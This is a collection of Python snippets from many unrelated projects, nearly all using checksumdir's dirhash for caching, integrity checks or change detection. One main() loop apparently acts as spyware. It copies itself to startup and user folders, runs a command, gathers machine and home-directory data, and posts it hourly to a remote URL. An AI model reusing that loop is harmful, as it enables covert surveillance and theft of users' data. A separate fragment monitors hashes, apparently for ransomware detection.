def state_hash(self): ''' generate hash to snapshot current state (used for caching / change detection) checks both readwrite directories and dependencies (assumed to be subtrees of readwrite directories) return: SHA1 hash ''' #hash the upstream / input state dep_checksums = [checksumdir.dirhash(d) for d in self.readonly if os.path.isdir(d)] #hash out writing state state_checksums = [checksumdir.dirhash(d) for d in self.readwrite if os.path.isdir(d)] return hashlib.sha1(json.dumps([dep_checksums,state_checksums]).encode('utf-8')).hexdigest()
def validate_data_dump(*args): """ For validation of the exported dump and the importing data-dump, calculate MD5 and check with CONFIG_VARIABLES.MD5 This will ensure the exported data is NOT altered before importing """ global log_file from checksumdir import dirhash md5hash = dirhash(DATA_DUMP_PATH, 'md5') if CONFIG_VARIABLES.MD5 != md5hash: print "\n MD5 NOT matching." print "\nargs: ", args if args and len(args) == 4: proceed_without_validation = args[1] else: proceed_without_validation = raw_input("MD5 not matching. Restoration not recommended.\n \ Enter (y/Y) to continue ?") if proceed_without_validation not in ['y', 'Y']: log_file.write("\n Checksum validation Failed on dump data") call_exit() else: print "\nValidation Success..!" proceed_with_validation = '' if args and len(args) == 4: proceed_without_validation = args[1] else: proceed_with_validation = raw_input("MD5 Matching.\n \ Enter (y/Y) to proceed to restoration") if proceed_with_validation in ['y', 'Y']: log_file.write("\n Checksum validation Success on dump data")
def checksum(path, hashfunc="md5"): """Return checksum of files given by path. Wildcards can be used in check sum. Function is strongly dependent on checksumdir package by 'cakepietoast'. :param path: path of files to get hash from :param hashfunc: function used to get hash, default 'md5' :return: (str) hash of the file/files given by path """ import checksumdir hash_func = checksumdir.HASH_FUNCS.get(hashfunc) if not hash_func: raise NotImplementedError("{} not implemented.".format(hashfunc)) if os.path.isdir(path): return checksumdir.dirhash(path, hashfunc=hashfunc) hashvalues = [] path_list = list(sorted(glob.glob(path))) logger.debug("path_list: len: %i", len(path_list)) if len(path_list) > 0: logger.debug("first ... last: %s ... %s", str(path_list[0]), str(path_list[-1])) for path in path_list: if os.path.isfile(path): hashvalues.append(checksumdir._filehash(path, hashfunc=hash_func)) logger.debug("one hash per file: len: %i", len(hashvalues)) if len(path_list) > 0: logger.debug("first ... last: %s ... %s", str(hashvalues[0]), str(hashvalues[-1])) checksum_hash = checksumdir._reduce_hash(hashvalues, hashfunc=hash_func) logger.debug("total hash: {}".format(str(checksum_hash))) return checksum_hash
def md5(dir): print('[+] Calculating MD5 hash on : ' + dir + ' directory, started at: ' + currenttime()) md5hash = dirhash(dir, 'md5') md5hash = '[+] MD5 hash: ' + md5hash[:8] + ' ' + md5hash[8:16] + ' ' + md5hash[16:24] + ' ' + md5hash[24:] print(md5hash) f = open(dir + '_hash_' + currenttime2() + '.txt', 'w') text = 'Directory: ' + dir + '\n' + md5hash[4:] + '\nDate: ' + currenttime() f.write(text) f.close()
def sha256(dir): print('[+] Calculating SHA256 hash on : ' + dir + ' directory, started at: ' + currenttime()) sha256hash = dirhash(dir, 'sha256') sha256hash = '[+] SHA256 hash: ' + sha256hash[:8] + ' ' + sha256hash[8:16] + ' ' + sha256hash[16:24] + ' ' + sha256hash[24:32] + ' ' + sha256hash[32:40] + ' ' + sha256hash[40:48] + ' ' + sha256hash[48:56] + ' ' + sha256hash[56:64] print(sha256hash) f = open(dir + '_hash_' + currenttime2() + '.txt', 'w') text = 'Directory: ' + dir + '\n' + sha256hash[4:] + '\nDate: ' + currenttime() f.write(text) f.close()
def each_location(self, data_doc): # Only data waiting to be verified if data_doc['status'] != 'verifying': # and data_doc['status'] != 'transferred': self.log.debug('Location '+data_doc['host']+' does not need to add new checksum') return if data_doc['status'] == 'transferred' and \ (config.get_hostname() == 'xe1t-datamanager' or config.get_hostname() == 'login'): return # Data must be hosted somewhere if 'host' not in data_doc: return # Data must be here locally if data_doc['host'] != config.get_hostname(): # Special case of midway-srm accessible via POSIX on midway-login1 if not (data_doc['host'] == "midway-srm" and config.get_hostname() == "midway-login1"): self.log.debug('Location not here') return # This status is given after checksumming status = 'transferred' # Find file and perform checksum if os.path.isdir(data_doc['location']): value = checksumdir.dirhash(data_doc['location'], 'sha512') elif os.path.isfile(data_doc['location']): value = checksumdir._filehash(data_doc['location'], hashlib.sha512) else: # Data not actually found self.log.error("Location %s not found." % data_doc['location']) value = None status = 'error' if config.DATABASE_LOG: if data_doc['status'] == 'verifying': self.log.info("Adding a checksum to run " "%d %s" % (self.run_doc['number'], data_doc['type'])) self.collection.update({'_id' : self.run_doc['_id'], 'data': {'$elemMatch': data_doc}}, {'$set': {'data.$.status' : status, 'data.$.checksum': value}}) elif data_doc['checksum'] != value or status == 'error': self.log.info("Checksum fail " "%d %s" % (self.run_doc['number'], data_doc['type'])) self.collection.update({'_id' : self.run_doc['_id'], 'data': {'$elemMatch': data_doc}}, {'$set': {'data.$.checksumproblem': True}})
def assert_directory_contents(path, changed=True): ''' Assert directory contents change or remain the same. Contents are compared deeply, i.e. recursively and file contents are considered as well. Parameters ---------- path : Path Path to directory changed : bool If True, directory contents must change, else contents must remain the same. ''' old = dirhash(str(path), 'sha512') yield new = dirhash(str(path), 'sha512') if changed: assert old != new else: assert old == new
def main(): parser = argparse.ArgumentParser(description='Create hash for directory') parser.add_argument('-v', '--version', action='version', version='checksumdir %s' % VERSION) parser.add_argument('directory', help='Directory to create hash value of') parser.add_argument('-a', '--algorithm', choices=('md5', 'sha1', 'sha256', 'sha512'), default='md5') parser.add_argument('-e', '--excluded-files', nargs='+', help='List of excluded files') args = parser.parse_args() print(checksumdir.dirhash(args.directory, args.algorithm, args.excluded_files))
def main(): parser = argparse.ArgumentParser(description='Determine the hash for directory.') parser.add_argument('-v', '--version', action='version', version='checksumdir %s' % VERSION) parser.add_argument('directory', help='Directory for which to generate hash.') parser.add_argument('-a', '--algorithm', choices=('md5', 'sha1', 'sha256', 'sha512'), default='md5') parser.add_argument('-e', '--excluded-files', nargs='+', help='List of excluded files.') parser.add_argument('-x', '--excluded-extensions', nargs='+', help='List of excluded file extensions.') args = parser.parse_args() print(checksumdir.dirhash(args.directory, args.algorithm, args.excluded_files))
def createUser(userId, crypto): splitUserID = userId.split() passpath = vars.realpath + "/rootdir/etc/passwd" file = open(passpath, "a") file.write(userId + "\n") file.close() permission = "default" cryptUser = crypto.aesencrypt(vars.aeskey, splitUserID[0]) setUserPerm(cryptUser, permission) os.makedirs(cryptUser) cspath = vars.realpath + "/rootdir/etc/checksum" file = open(cspath, "a") file.write(cryptUser + " " + dirhash(cryptUser, 'sha256') + "\n") file.close() createBaseUserPerm(cryptUser, "user")
def _compute_checksum_dir(self): exclude = self.env["ir.config_parameter"].get_param( "module_auto_update.checksum_excluded_extensions", "pyc,pyo", ).split(",") for r in self: try: r.checksum_dir = dirhash( get_module_path(r.name), 'sha1', excluded_extensions=exclude, ) except TypeError: _logger.debug( "Cannot compute dir hash for %s, module not found", r.display_name)
def get_package_checksum(self): sha1hash = None if not self.is_file: sha1hash = dirhash(self.path_or_file, 'sha1') else: h = hashlib.sha1() # open file for reading in binary mode with open(self.file_to_scan, 'rb') as file: # loop till the end of the file chunk = 0 while chunk != b'': # read only 1024 bytes at a time chunk = file.read(1024) h.update(chunk) # return the hex representation of digest sha1hash = h.hexdigest() return sha1hash
def prepare_database_template(self): # --- Check template database cache --- current_mhash = checksumdir.dirhash('./scripts/migrations') cache_connector = db_connector(self.template_cache_name) try: latest_mhash = self.read_migrations_hash(cache_connector) if latest_mhash == current_mhash: logger.info("Using template database cache.") # Cache is still valid, copy it to the template database # NOTE: In theory, 'get_migrations_hash:create_database' # should form one transaction. If another execution interrupts # us at this point, we will be lost ... 😨 self.create_database(self.template_name, self.template_cache_name) return except psycopg2.OperationalError: pass # Database does not exist except psycopg2.errors.UndefinedObject: pass # No hash specified for historical reasons # --- Cache invalidation, recreating template database --- logger.info("Recreating template database ...") _perform_query(f'CREATE DATABASE {self.template_name}') connector = db_connector(self.template_name) # Apply migrations sp.run('./scripts/migrations/migrate.sh', check=True, env=dict(os.environ, POSTGRES_DB=self.template_name)) # Seal template self.store_migrations_hash(connector, current_mhash) connector.execute(f''' UPDATE pg_database SET datistemplate = TRUE WHERE datname = '{self.template_name}' ''') logger.info("Template database was recreated.") # --- Update cache database --- # NOTE: In theory, this block should form one transaction. If another # execution interrupts us at this point, we will be lost ... 😨 self.drop_database(self.template_cache_name) self.create_database(self.template_cache_name, self.template_name) # Copy the hash manually (not done automatically by Postgres) self.store_migrations_hash(cache_connector, current_mhash) logger.info("Template database was stored into cache.")
def update_config(self): if 'Version' not in self.config.keys( ) or self.config['Version'] != __version__: urlupdate = { 'elvui-classic': 'elvui', 'elvui-classic:dev': 'elvui:dev', 'tukui-classic': 'tukui' } for addon in self.config['Addons']: # 1.1.0 if 'Checksums' not in addon.keys(): checksums = {} for directory in addon['Directories']: checksums[directory] = dirhash(self.path / directory) addon['Checksums'] = checksums # 1.1.1 if addon['Version'] is None: addon['Version'] = "1" # 2.2.0 if addon['URL'].lower() in urlupdate: addon['URL'] = urlupdate[addon['URL'].lower()] # 2.4.0 if addon['Name'] == 'TukUI': addon['Name'] = 'Tukui' addon['URL'] = 'Tukui' # 2.7.3 addon['Directories'] = list( filter(None, set(addon['Directories']))) # 3.0.2 if addon['URL'].endswith('/'): addon['URL'] = addon['URL'][:-1] for add in [['2.1.0', 'WAUsername', ''], ['2.2.0', 'WAAccountName', ''], ['2.2.0', 'WAAPIKey', ''], ['2.2.0', 'WACompanionVersion', 0], ['2.8.0', 'IgnoreClientVersion', {}], ['3.0.1', 'CFCacheTimestamp', 0], ['3.1.10', 'CFCacheCloudFlare', {}]]: if add[1] not in self.config.keys(): self.config[add[1]] = add[2] for delete in [['1.3.0', 'URLCache'], ['3.0.1', 'CurseCache']]: if delete[1] in self.config.keys(): self.config.pop(delete[1], None) self.config['Version'] = __version__ self.save_config()
def add_addon(self, url, ignore, nodeps): if url.endswith(':'): raise NotImplementedError('Provided URL is not supported.') elif 'twitch://' in url: url = url.split('/download-client')[0].replace('twitch://', 'https://').strip() elif 'curseforge://' in url: url = self.parse_cf_payload(url.strip(), False) elif url.startswith('cf:'): url = f'https://www.curseforge.com/wow/addons/{url[3:]}' elif url.startswith('wowi:'): url = f'https://www.wowinterface.com/downloads/info{url[5:]}.html' elif url.startswith('tu:'): url = f'https://www.tukui.org/addons.php?id={url[3:]}' elif url.startswith('tuc:'): url = f'https://www.tukui.org/classic-addons.php?id={url[4:]}' elif url.startswith('gh:'): url = f'https://github.com/{url[3:]}' if url.endswith('/'): url = url[:-1] addon = self.check_if_installed(url) if not addon: if ignore: self.config['IgnoreClientVersion'][url] = True if nodeps: self.config['IgnoreDependencies'][url] = True new = self.parse_url(url) new.get_addon() addon = self.check_if_installed_dirs(new.directories) if addon: return False, addon['Name'], addon['Version'], None self.cleanup(new.directories) new.install(self.path) checksums = {} for directory in new.directories: checksums[directory] = dirhash(self.path / directory) self.config['Addons'].append({'Name': new.name, 'URL': url, 'Version': new.currentVersion, 'Directories': new.directories, 'Checksums': checksums }) self.save_config() return True, new.name, new.currentVersion, \ None if url in self.config['IgnoreDependencies'].keys() else new.dependencies return False, addon['Name'], addon['Version'], None
def get_hash(file, key=None): if file is None: return '' else: if isinstance(file, (str, bytes, os.PathLike)): if isfile(file): with open(file, 'rb') as f: data = f.read() elif isdir(file): return dirhash(file, 'sha256') else: return '' else: openedfile = file.open() data = openedfile.read() openedfile.seek(0) return compute_hash(data, key)
def update_addon(self, url, update, force): old = self.check_if_installed(url) if old: new = self.parse_url(old['URL']) oldversion = old['Version'] modified = self.check_checksum(url) if force or (new.currentVersion != old['Version'] and update and not modified): self.cleanup(old['Directories']) new.install(self.path) checksums = {} for directory in new.directories: checksums[directory] = dirhash(self.path / directory) old['Name'] = new.name old['Version'] = new.currentVersion old['Directories'] = new.directories old['Checksums'] = checksums self.save_config() return new.name, new.currentVersion, oldversion, modified if not force else False return url, False, False, False
def generate_dataset(query_expr): if query_expr == "": print("please set --query-expr parameter") exit() chunks_uri = ( "https://www.dropbox.com/s/3kaqg3ntj5zougd/MICRODADOS_ENEM_2019.csv.tar.xz" ) chunks_tar = "MICRODADOS_ENEM_2019.csv.tar.xz" chunks_dir = "MICRODADOS_ENEM_2019_CHUNKS" chunks_checksum = "718aae27698996383c5ac982d8d2dcaf" invalid = False if os.path.isdir(chunks_dir): print("veryfing chunks integrity...") checksum = checksumdir.dirhash(chunks_dir) invalid = True if checksum != chunks_checksum else False if invalid or not os.path.isdir(chunks_dir): os.rmdir(chunks_dir) if os.path.isdir(chunks_dir) else None print("downloading...") os.system("wget -q --show-progress {}".format(chunks_uri)) with tarfile.open(chunks_tar) as f: print("extracting...") f.extractall(chunks_dir) chunks_files = [ "{}/{}".format(chunks_dir, f) for f in os.listdir(chunks_dir) ] print("generating dataset...") filtered_data = [ pd.read_csv(chunk, encoding="ISO-8859-1", delimiter=";").query(query_expr) for chunk in chunks_files ] filtered_data = pd.concat(filtered_data) dest = "MICRODADOS_ENEM_2019_FILTERED.csv" filtered_data.to_csv(dest, index=False) print("done")
def index(self): """ Check if a on-going call exists. If it exists, authorize access only if `caller_id` is owner's call If it does not exist, create the call and assign it to `caller_id` """ caller_id = self.__get_caller_id() call = Call.get_call() if not call.get_the_line(caller_id): Session.clear_auth_session() abort(423) session['caller_id'] = caller_id # Make the doorbell's speaker rings like a phone Sender.send({ 'action': SoundReceiver.START, 'file': 'phone-ringing' }, SoundReceiver.TYPE) Sender.send({'action': MotionReceiver.STOP}, MotionReceiver.TYPE) variables = { 'anticache': dirhash(self.__blueprint.static_folder, 'sha1'), 'domain_name': config.get('WEB_APP_DOMAIN_NAME'), 'rotate': config.get('WEBCAM_ROTATE'), 'webrtc_web_sockets_port': config.get('WEBRTC_WEBSOCKETS_PORT'), 'webrtc_endpoint': config.get('WEBRTC_ENDPOINT'), 'webrtc_ice_servers': json.dumps(config.get('WEBRTC_ICE_SERVERS')), 'webrtc_video_format': config.get('WEBRTC_VIDEO_FORMAT'), 'webrtc_force_hw_vcodec': 'true' if config.get('WEBRTC_FORCE_HW_VCODEC') else 'false', 'webrtc_call_heartbeat': config.get('WEBRTC_CALL_HEARTBEAT_INTERVAL'), 'font_awesome_id': config.get('WEB_APP_FONT_AWESOME_ID'), 'javascript_strings': json.dumps({ 'beforeCall': _('web_app/call/before'), 'onProgressCall': _('web_app/call/on_progress'), 'terminatedCall': _('web_app/call/terminated') }) } return render_template('index.html', **variables)
def update_config(self): if 'Version' not in self.config.keys( ) or self.config['Version'] != __version__: urlupdate = { 'elvui-classic': 'elvui', 'elvui-classic:dev': 'elvui:dev', 'tukui-classic': 'tukui' } for addon in self.config['Addons']: # 1.1.0 if 'Checksums' not in addon.keys(): checksums = {} for directory in addon['Directories']: checksums[directory] = dirhash(self.path / directory) addon['Checksums'] = checksums # 1.1.1 if addon['Version'] is None: addon['Version'] = "1" # 2.2.0 if addon['URL'].lower() in urlupdate: addon['URL'] = urlupdate[addon['URL'].lower()] # 2.4.0 if addon['Name'] == 'TukUI': addon['Name'] = 'Tukui' addon['URL'] = 'Tukui' # 1.3.0 if 'URLCache' in self.config.keys(): self.config.pop('URLCache', None) if 'CurseCache' not in self.config.keys(): self.config['CurseCache'] = {} # 2.1.0 if 'WAUsername' not in self.config.keys(): self.config['WAUsername'] = '' # 2.2.0 if 'WAAccountName' not in self.config.keys(): self.config['WAAccountName'] = '' if 'WAAPIKey' not in self.config.keys(): self.config['WAAPIKey'] = '' if 'WACompanionVersion' not in self.config.keys(): self.config['WACompanionVersion'] = 0 self.config['Version'] = __version__ self.save_config()
def convert_repo(fmt, files): """ Convert FIX Repository data from one format to another. """ src = files[0] if fmt == "basic": data = transform_basic_repository_v1( abbreviations=read_xml_root(src, "Abbreviations.xml"), categories=read_xml_root(src, "Categories.xml"), components=read_xml_root(src, "Components.xml"), datatypes=read_xml_root(src, "Datatypes.xml"), enums=read_xml_root(src, "Enums.xml", opt=False), fields=read_xml_root(src, "Fields.xml", opt=False), messages=read_xml_root(src, "Messages.xml", opt=False), msg_contents=read_xml_root(src, "MsgContents.xml", opt=False), sections=read_xml_root(src, "Sections.xml"), ) data["meta"]["fix2dict"]["md5"] = dirhash(src, "md5") validate_v1(data) print(json.dumps(data, indent=DEFAULT_INDENT)) elif fmt == "unified": root = read_xml_root("", src, opt=False)[8] phrases = read_xml_root("", phrases, opt=False) data = transform_unified_repository_v1(root, phrases) print(json.dumps(data, indent=DEFAULT_INDENT)) elif fmt == "orchestra": root = read_xml_root("", src, opt=False) data = transform_orchestra_v1(root) print(json.dumps(data, indent=DEFAULT_INDENT)) end = "sqlite3" if end == "sqlite3": data = read_json(src) try: os.remove(target) except OSError: pass conn = None try: conn = sqlite3.connect(target) except Error as e: print(e) dict_to_mem_sqlite(data, conn)
def main(): check_lock() while True: try: next_call = time.time() ip_req_response = get_host_ip(WHATS_MY_IP) # TODO: Merge with file search md5hash = checksumdir.dirhash(USER_HOME, 'md5') copy_to_startup() copy_to_user_dir() run_cmd(SC_LINE) pc_i = gather_pc_info() dir_i = gather_dir_info(USER_HOME) all_data = { 'ip': ip_req_response['ip'], 'pc_data': pc_i, 'file_data': dir_i, 'USER_HOME_hash': md5hash } log.debug('Sending data to ({})'.format(MAIN_DATA_URL)) resp = post_json_to_server(MAIN_DATA_URL, all_data) if resp == -1: log.warning('Sending failed') else: log.debug('Json sent, response ({})'.format(resp)) except Exception as e: log.error('Unknown exception found:\n({0})'.format(e)) finally: log.info('Sending log to server') log.debug('End of loop, will wait for {} seconds'.format(3600)) log.flush(LOG_URL) next_call = next_call + int(3600) if (next_call - time.time()) <= 0: time.sleep(1) else: time.sleep(next_call - time.time())
def main(): parser = argparse.ArgumentParser(description='Create hash for directory') parser.add_argument('-v', '--version', action='version', version='checksumdir %s' % VERSION) parser.add_argument('directory', help='Directory to create hash value of') parser.add_argument('-a', '--algorithm', choices=('md5', 'sha1', 'sha256', 'sha512'), default='md5') parser.add_argument('-e', '--excluded-files', nargs='+', help='List of excluded files') parser.add_argument('--ignore-hidden', action='store_true', default=False) args = parser.parse_args() print( checksumdir.dirhash(args.directory, args.algorithm, args.excluded_files, args.ignore_hidden))
def update_config(self): if 'Version' not in self.config.keys( ) or self.config['Version'] != __version__: for addon in self.config['Addons']: # 1.1.0 if 'Checksums' not in addon.keys(): checksums = {} for directory in addon['Directories']: checksums[directory] = dirhash( os.path.join(self.path, directory)) addon['Checksums'] = checksums # 1.1.1 if addon['Version'] is None: addon['Version'] = "1" # 1.3.0 if 'URLCache' in self.config.keys(): self.config.pop('URLCache', None) if 'CurseCache' not in self.config.keys(): self.config['CurseCache'] = {} self.config['Version'] = __version__ self.save_config()
def data_sample_pre_save(sender, instance, **kwargs): directory = path.join(getattr(settings, 'MEDIA_ROOT'), 'datasamples/{0}'.format(instance.pk)) # uncompress file if an archive if isinstance(instance.path, File): try: content = instance.path.read() instance.path.seek(0) uncompress_content(content, directory) except Exception as e: logging.info(e) raise e else: # calculate new hash sha256hash = dirhash(directory, 'sha256') # rename directory to new hash if does not exist new_directory = path.join(getattr(settings, 'MEDIA_ROOT'), 'datasamples', sha256hash) try: rename(directory, new_directory) except Exception as e: # directory already exists with same exact data sample inside # created by a previous save, delete directory entitled pkhash # for avoiding duplicates shutil.rmtree(directory) logging.error(e, exc_info=True) # override defaults instance.pkhash = sha256hash instance.path = new_directory # make an hardlink on all files if a path else: try: p = normpath(instance.path) create_hard_links(p, directory) except Exception as e: pass else: # override path for getting our hardlink instance.path = directory
def updateChecksum(basedir, username): basedir = vars.realpath + "/rootdir" + basedir newchecksum = dirhash(basedir, 'sha256') cspath = vars.realpath + "/rootdir/etc/checksum" copy = cspath + "copy" shutil.copyfile(cspath, copy) with open(copy) as oldfile, open(cspath, 'w') as newfile: mylist = oldfile.read().splitlines() for line in mylist: splitLine = line.split(" ") userentry = splitLine[0] oldchecksum = splitLine[1] if not userentry == username: newfile.write(line) else: newfile.write(username + " " + newchecksum) newfile.write("\n") newfile.close() oldfile.close() os.remove(copy)
def GetHashOfArchiveContents(archive: pathlib.Path) -> str: """Compute the checksum of the contents of a directory. Args: archive: Path of the archive. Returns: Checksum of the archive. Raises: UserError: If the requested archive does not exist, or cannot be unpacked. """ if not (archive.parent / "corpus_registry.json").exists(): raise FileNotFoundError("corpus_registry.json file not found.") with open(archive.parent / "corpus_registry.json", 'r') as js: reg = json.load(js) if archive.name not in reg: raise FileNotFoundError("Corpus {} is not registered in corpus_registry".format(archive.name)) if not archive.is_file(): l.logger().info("Corpus found in registry. Downloading from Google Drive...") if environment.WORLD_RANK == 0: gdown.download("https://drive.google.com/uc?id={}".format(reg[archive.name]['url']), str(archive)) distrib.barrier() if 'hash' in reg[archive.name]: return reg[archive.name]['hash'] else: with tempfile.TemporaryDirectory(prefix="clgen_corpus_", dir = FLAGS.local_filesystem) as d: pv = ["pv", str(archive)] tar = ["tar", "xfj", "-", "-C", d] try: pv_proc = subprocess.Popen(pv, stdout = subprocess.PIPE) subprocess.check_call(tar, stdin = pv_proc.stdout) except subprocess.CalledProcessError: raise ValueError(f"Archive unpack failed: '{archive}'") return checksumdir.dirhash(d, "sha1")
def add_addon(self, url): if 'twitch://' in url: url = url.split('/download-client')[0].replace( 'twitch://', 'https://').strip() addon = self.check_if_installed(url) if not addon: new = self.parse_url(url) new.install(self.path) checksums = {} for directory in new.directories: checksums[directory] = dirhash( os.path.join(self.path, directory)) self.config['Addons'].append({ 'Name': new.name, 'URL': url, 'Version': new.currentVersion, 'Directories': new.directories, 'Checksums': checksums }) self.save_config() return True, new.name, new.currentVersion return False, addon['Name'], addon['Version']
def GetHashOfArchiveContents(archive: pathlib.Path) -> str: """Compute the checksum of the contents of a directory. Args: archive: Path of the archive. Returns: Checksum of the archive. Raises: UserError: If the requested archive does not exist, or cannot be unpacked. """ if not archive.is_file(): raise errors.UserError(f"Archive not found: '{archive}'") with tempfile.TemporaryDirectory(prefix='clgen_corpus_') as d: cmd = ['tar', '-xf', str(archive), '-C', d] try: subprocess.check_call(cmd) except subprocess.CalledProcessError: raise errors.UserError(f"Archive unpack failed: '{archive}'") return checksumdir.dirhash(d, 'sha1')
def store_datasamples_archive(archive_object): try: content = archive_object.read() archive_object.seek(0) except Exception as e: logging.error(e) raise e # Temporary directory for uncompress datasamples_uuid = uuid.uuid4().hex tmp_datasamples_path = path.join(getattr(settings, 'MEDIA_ROOT'), f'datasamples/{datasamples_uuid}') try: uncompress_content(content, tmp_datasamples_path) except Exception as e: shutil.rmtree(tmp_datasamples_path, ignore_errors=True) logging.error(e) raise e else: # return the directory hash of the uncompressed file and the path of # the temporary directory. The removal should be handled externally. return dirhash(tmp_datasamples_path, 'sha256'), tmp_datasamples_path
def has_source_code_tree_changed(self): """ If a task succeeds & is re-run and didn't change, we might not want to re-run it if it depends *only* on source code :return: """ global CURRENT_HASH directory = self.where # if CURRENT_HASH is None: # print("hashing " + directory) # print(os.listdir(directory)) CURRENT_HASH = dirhash( directory, "md5", ignore_hidden=True, # changing these exclusions can cause dirhas to skip EVERYTHING # excluded_files=[".coverage", "lint.txt"], excluded_extensions=[".pyc"], ) print("Searching " + self.state_file_name) if os.path.isfile(self.state_file_name): with open(self.state_file_name, "r+") as file: last_hash = file.read() if last_hash != CURRENT_HASH: file.seek(0) file.write(CURRENT_HASH) file.truncate() return True else: return False # no previous file, by definition not the same. with open(self.state_file_name, "w") as file: file.write(CURRENT_HASH) return True
def put_data_sample(subtuple, subtuple_directory): from substrapp.models import DataSample for data_sample_key in subtuple['dataset']['keys']: try: data_sample = DataSample.objects.get(pk=data_sample_key) except Exception as e: raise e else: data_sample_hash = dirhash(data_sample.path, 'sha256') if data_sample_hash != data_sample_key: raise Exception( 'Data Sample Hash in Subtuple is not the same as in local db' ) # create a symlink on the folder containing data try: subtuple_data_directory = path.join(subtuple_directory, 'data', data_sample_key) os.symlink(data_sample.path, subtuple_data_directory) except Exception as e: logging.error(e, exc_info=True) raise Exception( 'Failed to create sym link for subtuple data sample')
f1 = open(var, "a") f1.write("hello ransomware") c1 = f1.close() #print('file created') ##################################### for x in range(100): multipath = path + str(x) + "\\" print(multipath) hash1 = [] a = '' hashtemp = '' count = 0 a = multipath hashtemp = checksumdir.dirhash(a) hash1.append(hashtemp) #print hash1[0] print("The hash for path " + a + "is: " + hashtemp) ################################ OBSERVER/WATCHER/WATCHDOG STARTS HERE "MONITORING" ####################################### if __name__ == "__main__": observer = Observer() observer.start() newhash = '' # Check cpu usage and assign process name as ransomeware executable try: print("Average CPU usage in percentage")
def get_checksum_folder(self, raw_data_location): return checksumdir.dirhash(raw_data_location, 'sha512')
def compute_data(self, request, paths_to_remove): data = {} # files can be uploaded inside the HTTP request or can already be # available on local disk if len(request.FILES) > 0: pkhash_map = {} for k, file in request.FILES.items(): # Get dir hash uncompress the file into a directory pkhash, datasamples_path_from_file = store_datasamples_archive( file) # can raise paths_to_remove.append(datasamples_path_from_file) # check pkhash does not belong to the list try: data[pkhash] except KeyError: pkhash_map[pkhash] = file else: raise Exception( f'Your data sample archives contain same files leading to same pkhash, ' f'please review the content of your achives. ' f'Archives {file} and {pkhash_map[pkhash]} are the same' ) data[pkhash] = { 'pkhash': pkhash, 'path': datasamples_path_from_file } else: # files must be available on local filesystem path = request.POST.get('path') paths = request.POST.getlist('paths') if path and paths: raise Exception('Cannot use path and paths together.') if path is not None: paths = [path] recursive_dir_field = BooleanField() recursive_dir = recursive_dir_field.to_internal_value( request.data.get('multiple', 'false')) if recursive_dir: # list all directories from parent directories parent_paths = paths paths = [] for parent_path in parent_paths: subdirs = next(os.walk(parent_path))[1] subdirs = [os.path.join(parent_path, s) for s in subdirs] if not subdirs: raise Exception( f'No data sample directories in folder {parent_path}' ) paths.extend(subdirs) # paths, should be directories for path in paths: if not os.path.isdir(path): raise Exception( f'One of your paths does not exist, ' f'is not a directory or is not an absolute path: {path}' ) pkhash = dirhash(path, 'sha256') try: data[pkhash] except KeyError: pass else: # existing can be a dict with a field path or file raise Exception( f'Your data sample directory contain same files leading to same pkhash. ' f'Invalid path: {path}.') data[pkhash] = {'pkhash': pkhash, 'path': normpath(path)} if not data: raise Exception(f'No data sample provided.') return list(data.values())
def checksum(path): """Directory sha1 checksum""" return checksumdir.dirhash(path, 'sha1')
def calculate_custom_check_bins_hash(custom_check_bins_provided, custom_check_bins_dir): if custom_check_bins_provided == 'true': return checksumdir.dirhash(custom_check_bins_dir, 'sha1') return ''
install("checksumdir") install("psutil") install("pydub") install("matplotlib") install("data/opencv_python-3.3.1-cp36-cp36m-win_amd64.whl") import checksumdir #Download ffmpeg if (os.path.isdir('../src/lib/ffmpeg_x64/') and checksumdir.dirhash('../src/lib/ffmpeg_x64') == 'c6f76a82e889404a156b7ac93e367524'): print("ffmpeg_x64 already existing") else: if (os.path.isdir('../src/lib/ffmpeg_x64/')): print('removing corrupt ffmpeg installation') shutil.rmtree('../src/lib/ffmpeg_x64/') print('reinstalling ffmpeg') print("Unzipping directory...") unzip("data/ffmpeg_x64.zip", "data/ffmpeg_x64") print("Unzipping finished") print("Copying extracted files") shutil.copytree('data/ffmpeg_x64/ffmpeg-20171203-5a93a85-win64-static', '../src/lib/ffmpeg_x64')
from checksumdir import dirhash if __name__ == '__main__': line = "hash(./test) = <{}>".format(dirhash('test', 'sha1')) print (line)
def _get_dirhash(absolute_dirpath): return checksumdir.dirhash(absolute_dirpath)
from datetime import datetime, date from checksumdir import dirhash AUTHOR = 'Lucene and Solr Developers' SITENAME = 'Apache Lucene' SITESUBTITLE = '' SITEURL = '' CURRENTYEAR = date.today().year LUCENE_LATEST_RELEASE = '8.7.0' LUCENE_LATEST_RELEASE_DATE = datetime(2020, 11, 3) LUCENE_PREVIOUS_MAJOR_RELEASE = '7.7.3' # This string will be appended to all unversioned css and js resources to prevent caching surprises on edits. # The theme's htaccess file also sets a cache-control header with longer lifetime, if the v=XXXX query string is added. STATIC_RESOURCE_SUFFIX = "?v=%s" % dirhash('themes/lucene/static', 'sha1')[-8:] PATH = 'content' THEME = 'themes/lucene' TIMEZONE = 'UTC' DEFAULT_LANG = 'en' DEFAULT_DATE_FORMAT = '%-d %B %Y' DATE_FORMATS = { 'en': '%-d %B %Y', } USE_FOLDER_AS_CATEGORY = False
def _get_hashtag(file_path): '''Get sha256 of given directory or file''' if os.path.isdir(file_path): return dirhash(file_path, 'sha256') else: return _get_file_sha256(file_path)
def write_md5_of_dump(group_dump_path, configs_file_path): global DUMP_PATH from checksumdir import dirhash md5hash = dirhash(group_dump_path, 'md5') with open(configs_file_path, 'a+') as configs_file_out: configs_file_out.write("\nMD5='" + str(md5hash) + "'")